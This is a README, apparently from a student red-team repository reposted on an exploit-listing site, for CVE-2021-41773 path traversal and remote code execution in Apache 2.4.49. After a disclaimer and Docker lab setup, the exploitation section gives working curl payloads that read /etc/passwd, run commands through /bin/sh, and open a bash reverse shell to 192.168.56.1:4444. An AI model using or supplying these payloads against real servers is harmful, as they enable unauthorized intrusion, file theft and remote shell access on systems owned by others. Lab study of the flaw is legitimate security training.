Share
## https://sploitus.com/exploit?id=20966067-9A09-5AEF-9BF3-B9B10992C9F5
# CVE-2021-41773 โ Apache HTTP Server 2.4.49 Path Traversal / RCE
**ITSOLERA Cybersecurity Department โ Red Team Task #3**
**Team: Offensive Team Zeta**
**Date: 18th March 2026**
---
## โ ๏ธ Disclaimer
This repository is for **educational purposes only**.
All testing was performed in an **isolated local Docker lab**.
Never use against live, production, or third-party systems.
---
## CVE Summary
| Field | Detail |
|---|---|
| CVE ID | CVE-2021-41773 |
| CVSS | 9.8 CRITICAL |
| Affected | Apache HTTP Server 2.4.49 ONLY |
| Type | Path Traversal + Remote Code Execution |
| Fixed In | Apache 2.4.51 |
---
## Repository Contents
| File | Description |
|---|---|
| `poc_41773.py` | Python PoC exploit script with Team Zeta banner |
| `docker-compose.yml` | Vulnerable lab environment setup |
| `offensive_zeta_shell.txt` | Live session log โ proof of exploitation |
| `screenshots/` | Evidence screenshots |
| `Offensive_Team_Zeta_FINAL_Report.pdf` | Full exploitation report |
---
## Lab Setup
```bash
# Pull the vulnerable image
sudo docker pull blueteamsteve/cve-2021-41773:with-cgid
# Start the lab
docker-compose up -d
# Verify Apache 2.4.49 is running
curl -I http://localhost:8080/
# Must show: Server: Apache/2.4.49
```
## Exploitation
```bash
# File read via path traversal
curl --path-as-is \
'http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd'
# Remote code execution
curl --path-as-is \
-d 'echo Content-Type: text/plain; echo; id' \
'http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'
# Reverse shell (replace IP with your machine IP)
curl --path-as-is \
-d "echo Content-Type: text/plain; echo; bash -c 'bash -i >& /dev/tcp/192.168.56.1/4444 0>&1'" \
"http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh"
```
## References
- https://nvd.nist.gov/vuln/detail/CVE-2021-41773
- https://www.exploit-db.com/exploits/50383
- https://httpd.apache.org/security/vulnerabilities_24.html